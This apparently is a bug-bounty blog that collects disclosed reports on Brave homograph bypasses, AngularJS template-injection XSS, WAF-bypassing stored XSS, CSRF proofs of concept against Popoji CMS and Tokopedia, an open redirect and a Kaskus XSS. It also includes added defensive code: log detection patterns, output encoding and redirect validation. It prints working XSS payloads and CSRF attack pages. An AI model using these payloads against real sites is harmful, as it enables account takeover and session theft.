Bypassing Homograph Attack Using `@` On Brave Browser

After a few months of not hunting bugs, I wanted to hunt again. I re-read my previous report on bypassing the homograph protection and looked at the patch code, and I thought I could bypass it again with a trick.

I looked at the patch on Brave's GitHub for my previous report and, with minimal programming skill, tried to bypass the homograph protection. I noticed their test code looks something like this:

```javascript
it('returns the punycode URL when given a valid URL', function () {
  assert.equal(urlUtil.getPunycodeUrl('http://brave:brave@ebа'), '')
})
```

I noticed that the part of the URL after the @ contains punycode and gets converted to ASCII. My weird logic said: maybe a punycode part placed before the @ is not converted to ASCII.

This is how I reproduced it:

This is the punycode URL ebаа = .

Set it as the homepage.

Attempt : 
- ebаа it'll become = ebа 
- ebаа it'll become = xn--eby-7cd.xn--com/
- ebаа it'll become = ebа

So it is true: the part before the @ is not converted to ASCII. To make the browser visit the link before the @, I add a / after the punycode. So when a user enters ebа, the user is redirected to:

Video :

I reported it to the Brave team on HackerOne; you can see my report at: . The Brave team was very fast at patching it, and I got rewarded with a bounty. Yeay!

I thanked them with a GIF for the very fast reply and patch, even though it was just a minor bug.

This is the GIF

You can also see the patch on their GitHub at:


Reflected XSS On Search Product via AngularJS Template Injection [ ]

Description :

I found a reflected XSS on via AngularJS. I found it by typing {{31338-1}} into their search page and getting the result 31337. I also read the HackerOne report from ysx as my reference for exploiting this.

I used the payload from ysx to exploit AngularJS: {{constructor.constructor('alert(document.domain)')()}}.

POC (Piye Om Carane, "how do you do it, uncle"):

  1. Log in to an account
  2. Insert the payload into the search field
  3. The XSS fires
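A defender's counterpart to the {{31338-1}} probe described above: an added example, not from this report or from Bukalapak, that scans web-server access logs for AngularJS interpolation probes and for the constructor.constructor sandbox-escape signature the payload above uses. The log lines, the /search path and the q parameter are constructed for the example.

```javascript
// Added example: detect AngularJS template-injection probes in access logs.
// SAMPLE_LOG is constructed; the path and parameter name are assumptions.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2017:10:00:01 +0700] "GET /search?q=sepatu HTTP/1.1" 200 5120',
  '203.0.113.5 - - [10/Oct/2017:10:00:09 +0700] "GET /search?q=%7B%7B31338-1%7D%7D HTTP/1.1" 200 5133',
  '198.51.100.7 - - [10/Oct/2017:10:01:30 +0700] "GET /search?q=%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D HTTP/1.1" 200 5170',
  '198.51.100.7 - - [10/Oct/2017:10:02:00 +0700] "GET /product/123 HTTP/1.1" 200 9000',
];

const REQUEST_RE = /"(?:GET|POST) (\S+) HTTP\/[\d.]+"/;
// Interpolation markers: the first thing a tester sends is an arithmetic probe like {{31338-1}}.
const INTERPOLATION_RE = /\{\{[\s\S]*?\}\}/;
// Sandbox-escape signature shared by the public AngularJS payloads.
const ESCAPE_RE = /constructor\s*\.\s*constructor/;

// Classify one query-string value; returns null when nothing Angular-like is present.
function classifyQuery(rawValue) {
  // Decode once: what survives decoding is what the template engine would evaluate.
  let decoded;
  try {
    decoded = decodeURIComponent(rawValue.replace(/\+/g, ' '));
  } catch (e) {
    decoded = rawValue;
  }
  if (!INTERPOLATION_RE.test(decoded)) return null;
  return ESCAPE_RE.test(decoded) ? 'angular-sandbox-escape' : 'angular-interpolation-probe';
}

// Walk the log and report every parameter whose value looks like a probe.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const m = REQUEST_RE.exec(line);
    if (!m) continue;
    const path = m[1];
    const qIdx = path.indexOf('?');
    if (qIdx === -1) continue;
    for (const pair of path.slice(qIdx + 1).split('&')) {
      const eq = pair.indexOf('=');
      const name = eq === -1 ? pair : pair.slice(0, eq);
      const value = eq === -1 ? '' : pair.slice(eq + 1);
      const verdict = classifyQuery(value);
      if (verdict) hits.push({ ip: line.split(' ')[0], param: name, verdict });
    }
  }
  return hits;
}

console.log(scanLog(SAMPLE_LOG));
```

The arithmetic probe is worth alerting on by itself: it is the reconnaissance step that precedes the sandbox-escape payload, and on a site that does not use Angular it is still a clear sign of template-injection testing.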


Screenshot:

It was fixed 1 day after I reported it to them.

Reference :


Note: I got permission from Bukalapak to disclose this report.

For the Indonesian-language version, you can see my original report at:


Bypass Stored XSS on User Edit [ ]


I found a stored XSS in the name field on the user edit page. There is actually a WAF protecting it, but I found a payload that bypasses it.

Detail : 

Location Of Bug :

Payload : 

"'--!><Script /K/>confirm(1)</Script /K/>#

Step To Reproduce :

  1. Log in to your MatahariMall account
  2. Go to User Edit
  3. Set your name to the payload
  4. Save it

The XSS shows up, and it also fires when you open other pages, because your account name is displayed on those pages too.

Browser :

  1. Chrome And Firefox

Note :

The team fixed the bug 1 day after I sent the report. Wow!


Video :

Bypassing XSS

So, after they patched my previous report, I tried to bypass the fix, and I bypassed it with a new payload.

Payload : –!"><svg/onload=confirm("1")>

And the XSS popped up.

There are many ways to bypass the firewall.
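Both payloads above get past a WAF, which is the real lesson: the fix that survives new payload variants is output encoding at render time, not a blocklist. This added example (not MatahariMall's code) escapes the name field for the HTML text and double-quoted attribute contexts and shows the two payloads from this post rendered inert; the template shape and helper names are assumptions, and the second payload is written with ASCII punctuation.

```javascript
// Added example: contextual output encoding for a user-supplied display name.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape for HTML text nodes and double-quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render the display name in both places a profile page typically uses it
// (heading text and the pre-filled edit field). Template shape is assumed.
function renderProfile(name) {
  const safe = escapeHtml(name);
  return `<h1 class="name">${safe}</h1>` +
         `<input type="text" name="name" value="${safe}">`;
}

// True when the escaped form can no longer open a tag or close an attribute:
// no raw <, >, " or ' is left for the parser to act on.
function isInertAfterEscaping(name) {
  return !/[<>"']/.test(escapeHtml(name));
}

// The two payloads from this write-up (second one with ASCII punctuation).
const PAYLOAD_1 = '"\'--!><Script /K/>confirm(1)</Script /K/>#';
const PAYLOAD_2 = '-!"><svg/onload=confirm("1")>';

function demo() {
  return [PAYLOAD_1, PAYLOAD_2].map((payload) => ({
    payload,
    inert: isInertAfterEscaping(payload),
    html: renderProfile(payload),
  }));
}

console.log(demo());
```

Note that the WAF bypass tricks in the payloads (`/K/` inside the tag, `--!>`, `svg/onload`) do not matter to this code at all: every `<` and `"` becomes an entity regardless of what follows it, which is why encoding at the output context, rather than filtering at the input, is the fix that holds.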


Homograph Attack Bypass On Brave Browser

Hi guys, this time I tried testing the Brave browser, because I challenged myself to test something other than web applications and see what I could do with it. While searching for browser bugs in , I found a report about a homograph attack in the browser at 175286 and tried it, but it had already been patched, so I looked for another way to attack it. I read more references about browsers, and the URI Obfuscation reference gave me an idea: what about adding @ together with the punycode? And boom, it worked. Brave did not validate the URL properly, just like in the previous report. This is my report, but before sending it I checked it on Chrome, and Chrome shows the true URL.

Report #175286 has been patched and I tried it, but I have another way to bypass it. When we add a site to our homepage with an @, the URL is not validated properly; make sure it displays the punycode.

Products affected:

Brave 0.18.36 ( Linux & Windows )

Steps To Reproduce:

  • In the browser, add a homepage with the IDN @ebа
  • Close and reopen the browser
  • You can see it redirects to

Video :

Two days after that, the Brave team updated my report to triaged and gave me a bounty (half of the first reporter's). I was not satisfied with that (am I so greedy?) >.< and asked why. The Brave team said "this was awarded lower because it requires the URL to start with '@' which users would probably notice since it looks odd", and I think that's true, so I dug into it again: how could I attack it without the '@'? I tried different ways and found that the '@' is not required in the URL, so you can just use a URL like this: ebа . The Brave team said "seems valid" and gave me an extra bounty. Yay!
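Both Brave reports above come down to one parsing fact: the host after the @ is converted to its A-label (xn--) form, while the text before the @ is user-info and is not. This added example (not Brave's code) shows how a display layer should derive what to show, using Node's WHATWG URL parser; the sample URLs are constructed, with ebаy written using a Cyrillic а so that its A-label is the xn--eby-7cd label seen in the first write-up.

```javascript
// Added example, not Brave's code: derive what a URL bar or homepage setting
// should DISPLAY for a URL that may carry an IDN host and/or a user-info part
// before "@". Node's WHATWG URL parser converts the host to its A-label
// (xn--...) form but leaves user-info as percent-encoded UTF-8; a UI that
// shows the raw text before "@" as if it were the site is the gap both
// Brave reports describe.

function describeUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch (e) {
    return { valid: false, reason: 'unparseable' };
  }
  const hasUserInfo = url.username !== '' || url.password !== '';
  // The host the browser will really connect to, already in A-label form.
  const connectHost = url.hostname;
  const hostIsIdn = connectHost.split('.').some((label) => label.startsWith('xn--'));
  const warnings = [];
  if (hasUserInfo) warnings.push('url-carries-userinfo');
  if (hostIsIdn) warnings.push('host-is-idn');
  return {
    valid: true,
    hasUserInfo,
    // The decoded user-info is the text a naive UI might render verbatim;
    // it is not the host, so it must never be shown as the site name.
    userInfo: hasUserInfo ? decodeURIComponent(url.username) : '',
    connectHost,
    hostIsIdn,
    // Safe display form: A-label host plus path, user-info dropped.
    display: connectHost + url.pathname,
    warnings,
  };
}

// Constructed samples (not the write-up's exact strings): "eb\u0430y" spells
// "ebay" with a Cyrillic а (U+0430); its A-label is xn--eby-7cd, the label
// that appears in the first write-up.
const SAMPLES = [
  'http://eb\u0430y.com/',             // look-alike host on its own
  'http://eb\u0430y.com@example.com/', // look-alike text hidden in user-info
];

function summarize() {
  return SAMPLES.map((input) => ({ input, ...describeUrl(input) }));
}

console.log(JSON.stringify(summarize(), null, 2));
```

The second sample is the shape of the original `@` trick: `connectHost` is `example.com`, while `userInfo` is the look-alike text. Whatever policy a browser applies to IDN display (show the A-label, or allow the Unicode form only for single-script labels) has to be applied to `connectHost`, and user-info should never be part of what is presented as the destination.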


Missing CSRF Token On Add Admin [Popoji CMS]


This happens because the add-admin request has no CSRF token.

Step To Reproduce :

```html
<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack"POST", "http://root/popoji/poadmin/route.php?mod=user&act=addnew", true);
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send(/* form fields of the add-admin request; elided on the page */);
}
</script>
<button onclick="getMe();">Let's Rock</button>
```

1. Save the code as an .html file
2. Upload it to a host
3. Open it

Video :

Fix & Mitigation :

Require a CSRF token on requests that perform sensitive actions.

They gave me permission to disclose it, and they said the patch will be deployed in the next version. So if you use Popoji CMS, be careful: don't trust links from unknown people, and keep your CMS updated. They also gave me a bounty for this! Yeey!

Session Not Expired When Password Has Been Changed []


When a user changes the password from another platform, the previous platform is still connected to the account and can still edit the profile.


1. Log in on Mozilla,
2. Log in on Chrome,
3. Change the password on Chrome.
4. Go back to Mozilla; you are still able to access the account.
5. You can still edit the profile.

Video : (unlisted )

Note: I asked for permission to write about it on my blog, and they gave me permission, so I am writing it here.

Hope you enjoy~

Open Redirect On

Description : 

Open redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application's access control check and then forward the attacker to privileged functions that they would normally not be able to access.

Impact :

Forces the user to go to an untrusted website from the Codepolitan website.

Location of bug :

Payload :

Reproduce :

1. Open
2. Log in, and you will be redirected to
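A check that closes the open redirect described above, as an added example that is not Codepolitan's code: the post-login target is resolved against the site's own origin and only its path component is reused, so any input that would land on another host falls back to the home page. SITE_ORIGIN and the inputs in CASES are constructed for the example.

```javascript
// Added example: validate a post-login "next" parameter so a redirect can
// only land on the site's own origin. SITE_ORIGIN is an assumed value.
const SITE_ORIGIN = 'https://example.com';

function safeRedirectTarget(next, fallback = '/') {
  if (typeof next !== 'string' || next.length === 0) return fallback;
  let url;
  try {
    // Resolve relative to the site so bare paths like "/dashboard" work, while
    // "//evil.example", "/\evil.example" and "https://evil.example" all
    // resolve to a foreign origin and are rejected below.
    url = new URL(next, SITE_ORIGIN);
  } catch (e) {
    return fallback;
  }
  // "javascript:" and "data:" URLs have an opaque origin ("null"), so they fail this too.
  if (url.origin !== SITE_ORIGIN) return fallback;
  // Re-emit only the path component: drops any scheme, host or user-info the input carried.
  return url.pathname + url.search + url.hash;
}

// Constructed inputs: the first two are legitimate, the rest are the usual
// ways of smuggling a foreign destination past a naive "starts with /" check.
const CASES = [
  '/dashboard',
  'https://example.com/profile?tab=1#top',
  '//evil.example/login',
  '/\\evil.example',
  'https://evil.example/',
  'https://example.com@evil.example/',
  'https://example.com.evil.example/',
  'javascript:alert(1)',
];

function runCases() {
  return CASES.map((input) => [input, safeRedirectTarget(input)]);
}

console.log(runCases());
```

Returning the path rather than the validated absolute URL is deliberate: it means the redirect is always same-origin by construction, and a later change to the check cannot accidentally start echoing a host the user supplied.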

Conclusion : 

An open redirect makes users unsafe because it forces them to an untrusted website (scam/phishing) without their knowledge.

Video : 

Note :

The Codepolitan crew was very fast at patching the bug, and they will also give me swag and add my name to their hall of fame. Yeay!

Credit :

Missing CSRF Token On Change Picture Request []


Actually I found many CSRF issues on Tokopedia, but I am only writing about this one on my blog; if you want to see all of them, go to my old blog:


This bug exists because the change-picture request has no CSRF token protecting it.

Vulnerable Request :

```http
POST /ajax/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 526
Cookie: <somecookie>
Connection: close
```

PoC Code:

```html
<script>
function getMe(){
  // retrieve page content
  var xhr = new XMLHttpRequest();

  // now execute the CSRF attack (target URL elided on the page)"POST", "", true);
  xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhr.send(/* file_path and the other form fields; elided on the page */);
}
</script>
<button onclick="getMe();">Let's Rock</button>
```

Note: file_path is another user's photo.

Step to reproduce:

  • Save the code as .html
  • Click `Let's Rock`
  • The photo will be updated with the photo from file_path

Video :

XSS On Kaskus

This is an old bug I found in 2016. I am writing it up on my new blog to share what I found, because I think this bug is very interesting and unique.


This bug is unique because the XSS is exposed when you are redirected back to the previous page after login.

Step To Reproduce

  • Go to
  • Change the parameter to "><img+src%3Dx+onerror%3Dprompt('XSS/By/LocalHost')%3B>
  • Log in with the widget at the top and you will be redirected
  • The XSS is exposed

HTTP response header:


Video : 

Note :

Kaskus responded very quickly, and I got swag from them.